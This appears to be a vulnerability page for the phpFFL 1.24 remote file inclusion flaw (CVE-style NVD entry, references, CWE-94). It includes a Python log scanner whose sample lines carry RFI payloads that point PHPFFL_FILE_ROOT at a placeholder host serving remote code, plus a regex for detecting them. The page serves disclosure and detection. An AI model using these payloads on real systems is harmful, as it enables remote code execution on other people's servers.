Aug 06, 2015 phpFFL is a free and fully customizable online Fantasy Football League Manager with a live (ajax) draft module. phpFFL is a web-based application which uses PHP & MySQL. League administration and individual team administration are all handled through the phpFFL web interface.
PhpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion. Webapps exploit for PHP platform. What you see here is the output of the 'arfis project', a simple Perl script. It automatically downloads and extracts PHP projects from sourceforge.net and checks for Remote File Inclusion vulnerabilities.

Current Description: Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFL_FILE_ROOT parameter to (1) admin.php, (2) custompages.php, (3) draft.php, (4) faq.php, (5) leagues.php, (6) livedraft.php, (7) login.php, (8) myteam.php, (9) profile.php, (10) signup.php, (11) statistics.php, (12) transactions.php.
Modified
This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.
Current Description
Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFL_FILE_ROOT parameter to (1) program_files/livedraft/livedraft.php or (2) program_files/livedraft/admin.php.
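The descriptions above name the scripts that accept a URL in PHPFFL_FILE_ROOT. As an added example (not code from the page, the NVD record or the phpFFL project), the following scans constructed web-server access-log lines for requests to those scripts whose PHPFFL_FILE_ROOT query parameter carries a URL, a protocol-relative host or a PHP stream wrapper, which is what an include() of that value would fetch. Script names come from the two descriptions on this page and are matched by basename, so the program_files/livedraft/ variants are covered; the log lines and IP addresses are constructed placeholders.

```python
"""Flag phpFFL requests whose PHPFFL_FILE_ROOT parameter carries a URL (possible RFI)."""
import re
from urllib.parse import urlsplit, parse_qs

# Scripts the advisory names as include() sinks for PHPFFL_FILE_ROOT.
AFFECTED_SCRIPTS = {
    "admin.php", "custompages.php", "draft.php", "faq.php", "leagues.php",
    "livedraft.php", "login.php", "myteam.php", "profile.php", "signup.php",
    "statistics.php", "transactions.php",
}
PARAM = "PHPFFL_FILE_ROOT"
# A remote URL, a protocol-relative //host, or a PHP stream wrapper in the
# parameter means include() would fetch and run attacker-controlled code.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//|^\s*(?:php|data|phar|expect):", re.I)
# Apache/nginx combined log format: client, ident, user, [time], "request", status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def is_rfi_attempt(request_target: str) -> bool:
    """True if the request hits an affected script with a URL-valued PHPFFL_FILE_ROOT."""
    parts = urlsplit(request_target)
    if parts.path.rsplit("/", 1)[-1] not in AFFECTED_SCRIPTS:
        return False
    # parse_qs percent-decodes, so an encoded http%3A%2F%2F... value is caught too.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    return any(REMOTE_VALUE.search(v) for v in values)

def scan_log(lines):
    """Return (client, timestamp, request_target) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        client, ts, _method, target, _status = m.groups()
        if is_rfi_attempt(target):
            hits.append((client, ts, target))
    return hits

# Constructed sample access-log lines (not real traffic); 198.51.100.9 is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Sep/2007:10:01:02 +0000] "GET /phpffl/login.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [14/Sep/2007:10:01:09 +0000] "GET /phpffl/login.php?PHPFFL_FILE_ROOT=http://198.51.100.9/inc.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [14/Sep/2007:10:01:15 +0000] "GET /phpffl/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http%3A%2F%2F198.51.100.9%2Finc.txt HTTP/1.1" 200 88',
    '198.51.100.7 - - [14/Sep/2007:10:02:00 +0000] "GET /phpffl/myteam.php?PHPFFL_FILE_ROOT=/var/www/phpffl HTTP/1.1" 200 900',
    '198.51.100.7 - - [14/Sep/2007:10:02:30 +0000] "GET /phpffl/index.php?PHPFFL_FILE_ROOT=http://198.51.100.9/x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for client, ts, target in scan_log(SAMPLE_LOG):
        print(client, ts, target)
```

Only GET requests are visible in an access log; a value sent in a POST body needs the same check applied at the application or WAF layer.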
Severity
CVSS 3.x Severity and Metrics (NIST/NVD)
NVD score not yet provided.
References

Hyperlink | Resource |
---|---|
http://arfis.wordpress.com/2007/09/14/rfi-02-phpffl-fantasy-football-league-manager/ | |
http://sourceforge.net/forum/forum.php?forum_id=735906 | |
http://sourceforge.net/project/shownotes.php?release_id=539716&group_id=137531 | Patch |
http://www.securityfocus.com/bid/25667 | Exploit |
http://www.vupen.com/english/advisories/2007/3176 | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/36606 | |
https://www.exploit-db.com/exploits/4406 | |
Weakness Enumeration
CWE-ID | CWE Name | Source |
---|---|---|
CWE-94 | Improper Control of Generation of Code ('Code Injection') | NIST |
Known Affected Software Configurations